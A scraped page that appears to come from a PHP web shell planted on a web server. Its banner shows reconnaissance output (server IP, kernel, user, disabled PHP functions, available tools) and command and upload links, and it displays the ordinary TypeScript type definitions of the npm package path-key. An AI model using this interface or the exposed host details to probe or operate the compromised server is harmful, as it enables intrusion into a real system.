Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/schema-utils/../path-key/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
/// <reference types="node" /> declare namespace pathKey { interface Options { /** Use a custom environment variables object. Default: [`process.env`](https://nodejs.org/api/process.html#process_process_env). */ readonly env?: {[key: string]: string | undefined}; /** Get the PATH key for a specific platform. Default: [`process.platform`](https://nodejs.org/api/process.html#process_process_platform). */ readonly platform?: NodeJS.Platform; } } declare const pathKey: { /** Get the [PATH](https://en.wikipedia.org/wiki/PATH_(variable)) environment variable key cross-platform. @example ``` import pathKey = require('path-key'); const key = pathKey(); //=> 'PATH' const PATH = process.env[key]; //=> '/usr/local/bin:/usr/bin:/bin' ``` */ (options?: pathKey.Options): string; // TODO: Remove this for the next major release, refactor the whole definition to: // declare function pathKey(options?: pathKey.Options): string; // export = pathKey; default: typeof pathKey; }; export = pathKey;